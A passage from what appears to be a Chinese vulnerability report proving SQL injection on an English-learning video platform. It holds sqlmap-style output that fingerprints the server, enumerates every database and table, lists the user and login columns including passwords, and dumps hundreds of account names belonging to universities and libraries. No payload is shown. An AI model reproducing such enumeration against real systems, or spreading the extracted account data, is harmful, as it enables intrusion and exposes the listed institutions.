| 华中科技大学文华学院 |
| 华中农业大学 |
| 华中师范大学 |
| 淮安信息职业技术学院 |
| 淮北师范大学 |
| 淮海工学院 |
| 淮南师范学院 |
| 淮阴工学院 |
| 淮阴师范学院 |
| 黄冈师范学院 |
| 黄冈图书馆 |
| 黄河科技学院 |
| 黄山学院 |
| 惠州慈云图书馆 |
| 惠州学院 |
| 霍林河电大 |
| 吉林财经大学 |
| 吉林大学 |
| 吉林工程技术师范学院 |
| 吉林化工学院 |
| 吉林建筑大学 |
| 吉林农业大学 |
| 吉林农业科技学院 |
| 吉林师范大学 |
| 吉林医药学院 |
| 吉首大学 |
| 集美大学 |
| 济南大学 |
| 济南市少儿图书馆 |
| 济南市图书馆 |
| 济宁学院 |
| 济宁医学院 |
| 暨南大学 |
| 佳木斯大学 |
| 嘉定区图书馆 |
| 嘉兴图书馆 |
| 嘉兴学院 |
| 江汉大学 |
| 江南大学 |
| 江苏财经职业技术学院 |
| 江苏广播电视大学 |
| 江苏海事职业技术学院 |
| 江苏建筑职业技术学院 |
| 江苏健康职业学院 |
| 江苏经贸职业技术学院 |
| 江苏农林职业技术学院 |
| 江苏农牧学院 |
| 江苏省淮阴商业学校 |
| 江苏师范大学 |
| 江苏食品职业技术学院 |
| 江西警察学院 |
| 江西科技师范大学 |
| 江西理工大学 |
| 江西农业大学 |
| 江西省图书馆 |
| 江西省委党校 |
| 江西师范大学 |
| 江西中医药大学 |
| 江阴市图书馆 |
| 解放军电子工程学院 |
| 解放军医学图书馆 |
| 金陵科技学院 |
| 金陵图书馆 |
| 晋中学院 |
| 荆楚理工学院 |
| 荆门图书馆 |
| 荆州职业技术学院 |
| 井冈山大学 |
| 景德镇市图书馆 |
| 景德镇陶瓷学院 |
| 静安区图书馆 |
| 九江市图书馆 |
| 九江学院 |
| 军事经济学院 |
| 开封市图书馆 |
| 昆明工业职业技术学院 |
| 昆明理工大学 |
| 昆明理工大学津桥学院 |
| 昆明市图书馆 |
| 昆明学院 |
| 昆明冶金高等专科学校 |
| 昆明医学院 |
| 兰州大学 |
| 兰州交通大学 |
| 兰州理工大学 |
| 兰州市图书馆 |

漏洞证明:

数据库类型:

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005


获得上百个数据库表:
Database: Englishlearning
[45 tables]
+---------------------------------------------------+
| Attention |
| Collections |
| ExtendedReadingAddNews |
| ExtendedReadingAddNews |
| Leadin |
| Praise |
| Ques |
| QuesUser |
| Schedule |
| TeacherRole |
| TopicDetails |
| TopicDetails |
| TopicDetailsTwo |
| Track |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| UserClassroom |
| Vocabulary |
| Years |
| days |
| isLoginJilu |
| keyswordList |
| moon |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_PageContentInsert |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| userInfo |
| userRole |
| viManagerPermission |
| viManagerPermission |
| viTopicDetailsTwoUinfo |
| viTopicDetailsUinfo |
| viTsys_News |
+---------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------+
| #0157C189 |
| #53FAC478 |
| #55F20351 |
| #610B9B96 |
| #7D5120FC |
+---------------------------------------------------+
Database: zhishishijie_Media
[49 tables]
+---------------------------------------------------+
| BatchItemList |
| BatchList |
| CaptionList |
| ChannelInfo |
| HomePageStat |
| IPList |
| LibList |
| Member |
| MessageList |
| NewsCode |
| PackList |
| SchoolList |
| Sheet1$ |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| VideoList |
| VideoQues |
| 'Twig Film nodes#csv$' |
| channel$ |
| downpart |
| lrc |
| packItemList |
| partVideoList |
| relate |
| scoreList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_MessageList |
| v_VideoQues |
| v_packitem |
| v_partvideo |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
| videoScore |
+---------------------------------------------------+
Database: zhishishijie_en
[61 tables]
+---------------------------------------------------+
| BigSite |
| Client |
| HomePageStat |
| IPListbak |
| IPListbak |
| Member |
| MessageList |
| Online |
| Origin_Page |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| VideoIPList |
| VideoList |
| View |
| address |
| captionlist2 |
| captionlist2 |
| codeid |
| danpian |
| downpart |
| dtproperties |
| lrc |
| partVideoList |
| relate |
| scoreList |
| spring2011 |
| tongbuen |
| tongbuen |
| tongbuold |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News2 |
| tsys_News2 |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| tsys_newsall |
| tsys_newsbak |
| v_MessageList |
| v_partvideo |
| v_videoIPList |
| v_videoNum |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoScore |
| videodc |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages90 |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
Database: lrcdb
[1 table]
+---------------------------------------------------+
| lrc |
+---------------------------------------------------+
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| **.**.**.**puted_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats_columns |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: jiangxiangGT
[27 tables]
+---------------------------------------------------+
| PackList |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| captionlist |
| keyswordList |
| lrc |
| packItemList |
| topicSumList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_PageContentInsert |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
+---------------------------------------------------+
Database: zhishishijieflash_person
[226 tables]
+---------------------------------------------------+
| App_ActionCount |
| App_ClassType |
| App_Commend |
| App_Comment |
| App_Count |
| App_IndexCommend |
| App_School |
| App_SetUpID |
| App_Subject |
| App_SuggesTion |
| App_UserCountMakeUse |
| App_UserCountMakeUse |
| App_ads |
| App_down |
| App_relationVideo |
| App_tsysImg |
| App_videoCount |
| Applications |
| BatchItemList |
| BatchList |
| BigSite |
| ChannelInfo |
| Client |
| Eng_contestsPro |
| EnglishContest |
| Flat_AD |
| GG_Company |
| GG_tsysID |
| HomePageStat1 |
| HomePageStat1 |
| HomePageStat2 |
| HomePageStat3 |
| HomePageStat4 |
| IPList |
| LibList |
| Member |
| MessageList |
| Online |
| Origin_Page |
| Other_magazine |
| PE_Admin |
| PE_Adv |
| PE_BookType |
| PE_Class |
| PE_Comment |
| PE_Configure |
| PE_History |
| PE_InIndex |
| PE_IpCount |
| PE_KnowledgeType |
| PE_MyCollect |
| PE_OrderItem |
| PE_OrderItem |
| PE_ShortVideo1 |
| PE_ShortVideo1 |
| PE_Suggest |
| PE_Teacher1 |
| PE_Teacher1 |
| PE_Teacher2 |
| PE_Teacher3 |
| PE_Teacher4 |
| PE_TeacherNews |
| PE_Ticket |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Temp_Fayi |
| Temp_captionlist |
| Temp_captionlist |
| Templrc |
| TopicSumUser |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| V_App_TsysNews |
| VideoList |
| View |
| ad_count |
| address |
| app_HotWord |
| app_ad |
| app_answer |
| app_result |
| captionlist2 |
| captionlist2 |
| captionlistbak |
| codeid |
| competitors10 |
| competitors10 |
| competitors10s |
| competitors11 |
| competitors12 |
| competitors13 |
| competitors14a |
| competitors14a |
| competitors15 |
| competitors16 |
| competitors2 |
| competitors3 |
| competitors4 |
| competitors6 |
| competitors6x |
| competitors7 |
| competitors9 |
| competitors9x |
| danpian |
| downpart1 |
| downpart1 |
| downpart2 |
| downpart3 |
| downpart4 |
| dv_AddPostRecord |
| dv_BookMark |
| dv_Commend |
| dv_NodeDTL |
| dv_NodeInfo |
| dv_UserMsg |
| dv_activity_convene |
| dv_activity_signup |
| dv_admin_menu |
| dv_admin_menu |
| dv_albumbbs |
| dv_albumbbs |
| dv_albumfav |
| dv_albumimg |
| dv_albumtype |
| dv_appraiseindex |
| dv_appraiseindex |
| dv_bbs1 |
| dv_bbsnews |
| dv_board_ads |
| dv_board_ads |
| dv_board_role |
| dv_class |
| dv_consume |
| dv_custom_tpl_label_files |
| dv_custom_tpl_label_files |
| dv_exexp |
| dv_friend |
| dv_fsetting |
| dv_group_Name |
| dv_group_bbs |
| dv_group_board |
| dv_group_topic |
| dv_group_type |
| dv_group_user |
| dv_help |
| dv_inviteCode |
| dv_inviteRegsetting |
| dv_keyword |
| dv_log |
| dv_medal |
| dv_message |
| dv_online |
| dv_pkbet |
| dv_postsigned |
| dv_procounter |
| dv_procredit |
| dv_product |
| dv_prostore |
| dv_protrade |
| dv_refuseip |
| dv_reward |
| dv_robotsadvent |
| dv_role |
| dv_setup |
| dv_stats |
| dv_tablelist |
| dv_topic_index_elite |
| dv_topic_index_elite |
| dv_topic_index_elite |
| dv_topic_index_special |
| dv_topic_index_topped |
| dv_upfile |
| dv_usergroups |
| dv_usergroups |
| dv_vote |
| dv_voteuser |
| lrc |
| packItemList |
| partVideoList |
| relate |
| scoreList |
| spring2011 |
| tongbu |
| topicRef |
| topicSum |
| topicSumShaoolType |
| topicSumvideoIPList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| tsys_newsbak |
| tsys_newsbak |
| v_App_Count |
| v_MessageList |
| v_packitem |
| v_partvideo |
| v_videoIPList1 |
| v_videoIPList1 |
| v_videoNum |
| viLiblist |
| viManagerPermission |
| viManagerPermission |
| viTempTsys_News |
| viTsys_News |
| videoIPList1 |
| videoIPList1 |
| videoIPList2 |
| videoIPList3 |
| videoIPList4 |
| videoScore |
| videoUserList |
| videodc |
+---------------------------------------------------+
Database: shaoer_gt
[48 tables]
+---------------------------------------------------+
| BigSite |
| CaptionList |
| ChannelInfo |
| Client |
| IPList |
| Member |
| MessageList |
| Online |
| Origin_Page |
| PackList |
| SchoolList |
| Site |
| SysDict |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| User_Address |
| VideoIPList |
| VideoList |
| View |
| address |
| danpian |
| lrc |
| partVideoList |
| relate |
| spring2011 |
| tongbu |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_partvideo |
| v_videoIPList |
| v_videoNum |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videodc |
+---------------------------------------------------+
Database: zhishishijie_German
[36 tables]
+---------------------------------------------------+
| BatchItemList |
| BatchList |
| IPList |
| Member |
| PackList |
| SchoolList |
| Tsys_ADClass |
| Tsys_ADClass |
| Tsys_ADView |
| VideoList |
| downpart |
| keyswordList |
| lrc |
| packItemList |
| partVideoList |
| proList |
| tsys_Author |
| tsys_Class |
| tsys_DynamicInsert |
| tsys_From |
| tsys_Import |
| tsys_Menu |
| tsys_News |
| tsys_OperatingRecord |
| tsys_ResPaging |
| tsys_Role |
| tsys_Speciality |
| tsys_StaticInsert |
| tsys_Template |
| tsys_User |
| v_packitem |
| viManagerPermission |
| viManagerPermission |
| viTsys_News |
| videoIPList |
| videoScore |
+---------------------------------------------------+
获得数据库字段:

Database: zhishishijieflash
Table: tsys_User
[12 columns]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| _MASK_FROM_V2 | timestamp |
| _MASK_TO_V2 | binary |
| AddTime | datetime |
| ID | int |
| IsLock | bit |
| LastLogTime | datetime |
| LogCount | int |
| LogTime | datetime |
| Name | varchar |
| NickName | varchar |
| Password | varchar |
| RoleID | int |
+---------------+-----------+
Database: zhishishijieflash
Table: sys.syslogins
[28 columns]
+---------------+
| Column |
+---------------+
| accdate |
| bulkadmin |
| createdate |
| dbcreator |
| dbname |
| denylogin |
| diskadmin |
| hasaccess |
| isntgroup |
| isntname |
| isntuser |
| language |
| loginname |
| name |
| password |
| processadmin |
| resultlimit |
| securityadmin |
| serveradmin |
| setupadmin |
| sid |
| spacelimit |
| status |
| sysadmin |
| timelimit |
| totcpu |
| totio |
| updatedate |
+---------------+


获得字段内容:
<code>web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: zhishishijieflash
Table: tsys_User
[895 entries]
+-------------------+
| Name |
+-------------------+
| admin |
| 阿盟电大 |
| 安徽财经大学 |
| 安徽大学 |
| 安徽工程大学 |
| 安徽工业大学 |
| 安徽国际商务职院 |
| 安徽建筑工业学院 |
| 安徽科技学院 |
| 安徽农业大学 |
| 安徽三联学院 |
| 安徽省党校 |
| 安徽省图书馆 |
| 安徽师范大学 |
| 安徽外国语学院 |
| 安徽新华学院 |
| 安徽医科大学 |
| 安徽中澳科技学院 |
| 安徽中医学院 |
| 安康学院 |
| 安庆师范学院 |
| 安庆市图书馆 |
| 安阳工学院 |
| 巴盟电大 |
| 白银市图书馆 |
| 百色学院 |
| 蚌埠学院 |
| 蚌埠医学院 |
| 包头电大 |
| 宝鸡市图书馆 |
| 宝鸡文理学院 |
| 保定市图书馆 |
| 北碚市图书馆 |
| 北方工业大学 |
| 北方民族大学 |
| 北海市图书馆 |
| 北华大学 |
| 北京城市学院 |
| 北京大学 |
| 北京第二外国语学院 |
| 北京电影学院 |
| 北京电子科技学院 |
| 北京电子科技职业学院 |
| 北京服装学院 |
| 北京工商大学 |
| 北京工业大学 |
| 北京工业大学实验学院 |
| 北京工业职业技术学院 |
| 北京航空航天大学 |
| 北京化工大学 |
| 北京吉利大学 |
| 北京建筑大学 |
| 北京科技大学 |
| 北京科技大学天津学院 |
| 北京理工大学 |
| 北京联合大学 |
| 北京林业大学 |
| 北京农学院 |
| 北京师范大学 |
| 北京石油化工学院 |
| 北京市东城区图书馆 |
| 北京体育大学 |
| 北京外国语大学 |
| 北京舞蹈学院 |
| 北京物资学院 |
| 北京信息科技大学 |
| 北京邮电大学 |
| 北京语言大学 |
| 滨州学院 |
| 渤海大学 |
| 沧州图书馆 |
| 昌吉学院 |
| 长安大学 |
| 长春工程学院 |
| 长春工业大学 |
| 长春建筑学院 |
| 长春理工大学 |
| 长春师范学院 |
| 长春中医药大学 |
| 长江大学 |
| 长江职业学院 |
| 长沙民政职业技术学院 |
| 长沙市图书馆 |
| 长沙学院 |
| 常州大学 |
| 常州工程职业技术学院 |
| 常州工学院 |
| 常州机电职业技术学院 |
| 常州轻工职业技术学院 |
| 常州图书馆 |
| 常州信息职业技术学院 |
| 巢湖学院 |
| 郴州市图书馆 |
| 成都大学 |
| 成都理工大学 |
| 成都信息工程学院 |
| 成都中医药大学 |
| 池州学院 |
| 赤峰电大 |
| 滁州学院 |
| 楚雄师范学院 |
| 大理大学 |
| 大连工业大学 |
| 大连海事大学 |
| 大连海洋大学 |
| 大连理工大学 |
| 大连市少儿图书馆 |
| 大连市图书馆 |
| 大连外国语学院 |
| 大连医科大学 |
| 大同市图书馆 |
| 大兴安岭电大 |
| 大雁电大 |
| 德州学院 |
| 第四军医大 |
| 电子科技大学 |
| 东北大学 |
| 东北电力大学 |
| 东北林业大学 |
| 东北农业大学 |
| 东北师范大学 |
| 东北石油大学 |
| 东华大学 |
| 东华理工大学 |
| 东莞理工学院 |
| 东莞市图书馆 |
| 对外经济贸易大学 |
| 鄂尔多斯电大 |
| 鄂尔多斯市图书馆 |
| 鄂州市图书馆 |
| 佛山禅城区图书馆 |
| 佛山市图书馆 |
| 佛山图书馆 |
| 涪陵区图书馆 |
| 福建电大 |
| 福建工程学院 |
| 福建南平市图书馆 |
| 福建农林大学 |
| 福建省图书馆 |
| 福建师范大学 |
| 福建医科大学 |
| 福建中医药大学 |
| 福州大学 |
| 福州外语外贸学院 |
| 抚州市图书馆 |
| 复旦大学 |
| 甘肃电大 |
| 甘肃民族师范学院 |
| 甘肃农业大学 |
| 甘肃省图书馆 |
| 甘肃政法学院 |
| 甘肃中医学院 |
| 赣南师范学院 |
| 根河电大 |
| 广安市邓小平图书馆 |
| 广东财经大学 |
| 广东第二师范学院 |
| 广东工程职业技术学院 |
| 广东工贸职业技术学院 |
| 广东工业大学 |
| 广东海洋大学图书馆 |
| 广东机电职业技术学院 |
| 广东技术师范学校 |
| 广东交通职业技术学院 |
| 广东培正学院 |
| 广东轻工职业技术学院 |
| 广东省广播电视大学 |
| 广东省中山图书馆 |
| 广东石油化工学院 |
| 广东外语外贸大学 |
| 广东外语艺术职业学院 |
| 广东药学院 |
| 广东医学院 |
| 广东中山图书馆 |
| 广西大学 |
| 广西工学院 |
| 广西机电职业技术学院 |
| 广西科技图书馆 |
| 广西民族大学 |
| 广西民族师范学院 |
| 广西师范大学 |
| 广西师范学院 |
| 广西医科大学 |
| 广西中医药大学 |
| 广西壮族自治区桂林图书馆 |
| 广西壮族自治区图书馆 |
| 广州白云学院 |
| 广州城市职业学院 |
| 广州大学 |
| 广州航海学院 |
| 广州美术学院 |
| 广州少年儿童图书馆 |
| 广州医科大学 |
| 广州中医药大学 |
| 贵阳市图书馆 |
| 贵阳学院 |
| 贵阳中医学院 |
| 贵州财经大学 |
| 贵州大学 |
| 贵州师范大学 |
| 贵州师范学院 |
| 桂林电子科技大学 |
| 桂林航天工业学院 |
| 桂林理工大学 |
| 国防科技大学 |
| 国家开放大学图书馆 |
| 哈尔滨工业大学 |
| 哈尔滨商业大学 |
| 哈尔滨师范大学 |
| 哈尔滨医科大学 |
| 海口经济学院 |
| 海南大学 |
| 海南师范大学 |
| 海南医学院 |
| 杭州电子科技大学 |
| 杭州广播电视大学 |
| 杭州师范大学 |
| 合肥财经学院 |
| 合肥工业大学 |
| 合肥师范学院 |
| 合肥市党校 |
| 合肥学院 |
| 河北大学 |
| 河北工程大学 |
| 河北工业大学 |
| 河北经贸大学 |
| 河北科技大学 |
| 河北联合大学 |
| 河北农业大学 |
| 河北医科大学 |
| 河南财经政法大学 |
| 河南城建学院 |
| 河南大学 |
| 河南工业大学 |
| 河南黄淮学院 |
| 河南机电高等专科学校 |
| 河南科技大学 |
| 河南农业大学 |
| 河南省图书馆 |
| 河南师范大学 |
| 河西学院 |
| 河源职业技术学院 |
| 菏泽学院 |
| 贺州学院 |
| 鹤壁市图书馆 |
| 黑龙江八一农垦大学 |
